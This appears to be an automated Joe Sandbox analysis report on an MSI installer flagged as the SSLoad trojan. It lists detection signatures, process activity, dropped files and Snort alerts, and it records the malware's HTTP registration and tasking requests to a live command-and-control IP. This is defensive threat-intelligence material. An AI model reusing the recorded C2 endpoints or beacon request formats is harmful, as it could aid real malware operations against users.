Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
avp.msi

Overview

General Information

Sample name:avp.msi
Analysis ID:1428527
MD5:4d81be09c23e02fab7364e508c21c111
SHA1:52cae521d7a808c8206f4b5afd6b037bc573b50e
SHA256:dcae57ec4b69236146f744c143c42cc8bdac9da6e991904e6dbf67ec1179286a
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Machine Learning detection for dropped file
PE file has a writeable .text section
Checks for available system drives (often done to infect USB drives)
Creates files inside the system directory
Deletes files inside the Windows folder
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • msiexec.exe (PID: 7012 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\avp.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7084 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 6408 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding C10F74E54A153762865D83F4FD97627E C MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 5088 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding E8F250EF0BB0858F7D9FA6A616305218 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.26.12.205, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5088, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
Timestamp:04/19/24-06:16:41.475526
SID:2052099
Source Port:49731
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:04/19/24-06:15:00.345059
SID:2052098
Source Port:49731
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:04/19/24-06:15:00.548302
SID:2052169
Source Port:80
Destination Port:49731
Protocol:TCP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://85.239.53.219/api/gatewayVirustotal: Detection: 9%Perma Link
Source: C:\Users\user\AppData\Local\sharepoint\forcedelctl.dllReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\sharepoint\forcedelctl.dllVirustotal: Detection: 49%Perma Link
Source: avp.msiReversingLabs: Detection: 15%
Source: avp.msiVirustotal: Detection: 23%Perma Link
Source: C:\Users\user\AppData\Local\sharepoint\forcedelctl.dllJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: avp.msi, MSI1DEC.tmp.1.dr, MSI1C29.tmp.0.dr, MSI1C9A.tmp.0.dr, MSI1E99.tmp.1.dr, MSI1B7B.tmp.0.dr, MSI1C09.tmp.0.dr, MSI1C6A.tmp.0.dr, 651cf2.msi.1.dr, MSI1C4A.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: avp.msi, MSI1DEC.tmp.1.dr, MSI1C29.tmp.0.dr, MSI1C9A.tmp.0.dr, MSI1E99.tmp.1.dr, MSI1B7B.tmp.0.dr, MSI1C09.tmp.0.dr, MSI1C6A.tmp.0.dr, 651cf2.msi.1.dr, MSI1C4A.tmp.0.dr
Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

Networking

barindex
Source: TrafficSnort IDS: 2052098 ET TROJAN Win32/SSLoad Registration Activity (POST) 192.168.2.4:49731 -> 85.239.53.219:80
Source: TrafficSnort IDS: 2052169 ET TROJAN Win32/SSLoad Registration Response 85.239.53.219:80 -> 192.168.2.4:49731
Source: TrafficSnort IDS: 2052099 ET TROJAN Win32/SSLoad Tasking Request (POST) 192.168.2.4:49731 -> 85.239.53.219:80
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 85.239.53.219 85.239.53.219
Source: Joe Sandbox ViewASN Name: RAINBOW-HKRainbownetworklimitedHK RAINBOW-HKRainbownetworklimitedHK
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: api.ipify.org
Source: global trafficHTTP traffic detected: POST /api/gateway HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonReferer: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 169Host: 85.239.53.219
Source: global trafficHTTP traffic detected: POST /api/7f841ea3-c875-6dfd-678b-29dc794014c1/tasks HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonReferer: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 0Host: 85.239.53.219
Source: global trafficHTTP traffic detected: POST /api/7f841ea3-c875-6dfd-678b-29dc794014c1/tasks HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonReferer: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 0Host: 85.239.53.219
Source: global trafficHTTP traffic detected: POST /api/7f841ea3-c875-6dfd-678b-29dc794014c1/tasks HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonReferer: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 0Host: 85.239.53.219
Source: global trafficHTTP traffic detected: POST /api/7f841ea3-c875-6dfd-678b-29dc794014c1/tasks HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonReferer: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 0Host: 85.239.53.219
Source: global trafficHTTP traffic detected: POST /api/7f841ea3-c875-6dfd-678b-29dc794014c1/tasks HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonReferer: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 0Host: 85.239.53.219
Source: global trafficHTTP traffic detected: POST /api/7f841ea3-c875-6dfd-678b-29dc794014c1/tasks HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonReferer: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 0Host: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.53.219
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: api.ipify.org
Source: unknownDNS traffic detected: queries for: api.ipify.org
Source: unknownHTTP traffic detected: POST /api/gateway HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonReferer: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 169Host: 85.239.53.219
Source: avp.msi, MSI1DEC.tmp.1.dr, MSI1C29.tmp.0.dr, MSI1C9A.tmp.0.dr, MSI1E99.tmp.1.dr, MSI1B7B.tmp.0.dr, MSI1C09.tmp.0.dr, MSI1C6A.tmp.0.dr, 651cf2.msi.1.dr, MSI1C4A.tmp.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: avp.msi, MSI1DEC.tmp.1.dr, MSI1C29.tmp.0.dr, MSI1C9A.tmp.0.dr, MSI1E99.tmp.1.dr, MSI1B7B.tmp.0.dr, MSI1C09.tmp.0.dr, MSI1C6A.tmp.0.dr, 651cf2.msi.1.dr, MSI1C4A.tmp.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: avp.msi, MSI1DEC.tmp.1.dr, MSI1C29.tmp.0.dr, MSI1C9A.tmp.0.dr, MSI1E99.tmp.1.dr, MSI1B7B.tmp.0.dr, MSI1C09.tmp.0.dr, MSI1C6A.tmp.0.dr, 651cf2.msi.1.dr, MSI1C4A.tmp.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: avp.msi, MSI1DEC.tmp.1.dr, MSI1C29.tmp.0.dr, MSI1C9A.tmp.0.dr, MSI1E99.tmp.1.dr, MSI1B7B.tmp.0.dr, MSI1C09.tmp.0.dr, MSI1C6A.tmp.0.dr, 651cf2.msi.1.dr, MSI1C4A.tmp.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: avp.msi, MSI1DEC.tmp.1.dr, MSI1C29.tmp.0.dr, MSI1C9A.tmp.0.dr, MSI1E99.tmp.1.dr, MSI1B7B.tmp.0.dr, MSI1C09.tmp.0.dr, MSI1C6A.tmp.0.dr, 651cf2.msi.1.dr, MSI1C4A.tmp.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: avp.msi, MSI1DEC.tmp.1.dr, MSI1C29.tmp.0.dr, MSI1C9A.tmp.0.dr, MSI1E99.tmp.1.dr, MSI1B7B.tmp.0.dr, MSI1C09.tmp.0.dr, MSI1C6A.tmp.0.dr, 651cf2.msi.1.dr, MSI1C4A.tmp.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: avp.msi, MSI1DEC.tmp.1.dr, MSI1C29.tmp.0.dr, MSI1C9A.tmp.0.dr, MSI1E99.tmp.1.dr, MSI1B7B.tmp.0.dr, MSI1C09.tmp.0.dr, MSI1C6A.tmp.0.dr, 651cf2.msi.1.dr, MSI1C4A.tmp.0.drString found in binary or memory: http://ocsp.digicert.com0C
Source: avp.msi, MSI1DEC.tmp.1.dr, MSI1C29.tmp.0.dr, MSI1C9A.tmp.0.dr, MSI1E99.tmp.1.dr, MSI1B7B.tmp.0.dr, MSI1C09.tmp.0.dr, MSI1C6A.tmp.0.dr, 651cf2.msi.1.dr, MSI1C4A.tmp.0.drString found in binary or memory: http://ocsp.digicert.com0O
Source: avp.msi, MSI1DEC.tmp.1.dr, MSI1C29.tmp.0.dr, MSI1C9A.tmp.0.dr, MSI1E99.tmp.1.dr, MSI1B7B.tmp.0.dr, MSI1C09.tmp.0.dr, MSI1C6A.tmp.0.dr, 651cf2.msi.1.dr, MSI1C4A.tmp.0.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: avp.msi, MSI1DEC.tmp.1.dr, MSI1C29.tmp.0.dr, MSI1C9A.tmp.0.dr, MSI1E99.tmp.1.dr, MSI1B7B.tmp.0.dr, MSI1C09.tmp.0.dr, MSI1C6A.tmp.0.dr, 651cf2.msi.1.dr, MSI1C4A.tmp.0.drString found in binary or memory: http://t2.symcb.com0
Source: avp.msi, MSI1DEC.tmp.1.dr, MSI1C29.tmp.0.dr, MSI1C9A.tmp.0.dr, MSI1E99.tmp.1.dr, MSI1B7B.tmp.0.dr, MSI1C09.tmp.0.dr, MSI1C6A.tmp.0.dr, 651cf2.msi.1.dr, MSI1C4A.tmp.0.drString found in binary or memory: http://tl.symcb.com/tl.crl0
Source: avp.msi, MSI1DEC.tmp.1.dr, MSI1C29.tmp.0.dr, MSI1C9A.tmp.0.dr, MSI1E99.tmp.1.dr, MSI1B7B.tmp.0.dr, MSI1C09.tmp.0.dr, MSI1C6A.tmp.0.dr, 651cf2.msi.1.dr, MSI1C4A.tmp.0.drString found in binary or memory: http://tl.symcb.com/tl.crt0
Source: avp.msi, MSI1DEC.tmp.1.dr, MSI1C29.tmp.0.dr, MSI1C9A.tmp.0.dr, MSI1E99.tmp.1.dr, MSI1B7B.tmp.0.dr, MSI1C09.tmp.0.dr, MSI1C6A.tmp.0.dr, 651cf2.msi.1.dr, MSI1C4A.tmp.0.drString found in binary or memory: http://tl.symcd.com0&
Source: avp.msi, MSI1DEC.tmp.1.dr, MSI1C29.tmp.0.dr, MSI1C9A.tmp.0.dr, MSI1E99.tmp.1.dr, MSI1B7B.tmp.0.dr, MSI1C09.tmp.0.dr, MSI1C6A.tmp.0.dr, 651cf2.msi.1.dr, MSI1C4A.tmp.0.drString found in binary or memory: http://www.digicert.com/CPS0
Source: avp.msi, MSI1DEC.tmp.1.dr, MSI1C29.tmp.0.dr, MSI1C9A.tmp.0.dr, MSI1E99.tmp.1.dr, MSI1B7B.tmp.0.dr, MSI1C09.tmp.0.dr, MSI1C6A.tmp.0.dr, 651cf2.msi.1.dr, MSI1C4A.tmp.0.drString found in binary or memory: https://www.advancedinstaller.com
Source: avp.msi, MSI1DEC.tmp.1.dr, MSI1C29.tmp.0.dr, MSI1C9A.tmp.0.dr, MSI1E99.tmp.1.dr, MSI1B7B.tmp.0.dr, MSI1C09.tmp.0.dr, MSI1C6A.tmp.0.dr, 651cf2.msi.1.dr, MSI1C4A.tmp.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: avp.msi, MSI1DEC.tmp.1.dr, MSI1C29.tmp.0.dr, MSI1C9A.tmp.0.dr, MSI1E99.tmp.1.dr, MSI1B7B.tmp.0.dr, MSI1C09.tmp.0.dr, MSI1C6A.tmp.0.dr, 651cf2.msi.1.dr, MSI1C4A.tmp.0.drString found in binary or memory: https://www.thawte.com/cps0/
Source: avp.msi, MSI1DEC.tmp.1.dr, MSI1C29.tmp.0.dr, MSI1C9A.tmp.0.dr, MSI1E99.tmp.1.dr, MSI1B7B.tmp.0.dr, MSI1C09.tmp.0.dr, MSI1C6A.tmp.0.dr, 651cf2.msi.1.dr, MSI1C4A.tmp.0.drString found in binary or memory: https://www.thawte.com/repository0W
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49730 version: TLS 1.2

System Summary

barindex
Source: forcedelctl.dll.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\651cf2.msiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1DEC.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1E99.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{52EF198D-0C6C-406A-803F-F86D93DD7930}Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1F37.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI1DEC.tmpJump to behavior
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\MSI1B7B.tmp 426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\MSI1C09.tmp 426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
Source: avp.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs avp.msi
Source: classification engineClassification label: mal80.winMSI@6/19@1/2
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CML1F73.tmpJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\yfdfromkrrgw
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI1B7B.tmpJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\TenantRestrictions\PayloadJump to behavior
Source: avp.msiReversingLabs: Detection: 15%
Source: avp.msiVirustotal: Detection: 23%
Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\avp.msi"
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C10F74E54A153762865D83F4FD97627E C
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E8F250EF0BB0858F7D9FA6A616305218
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C10F74E54A153762865D83F4FD97627E CJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E8F250EF0BB0858F7D9FA6A616305218Jump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msihnd.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
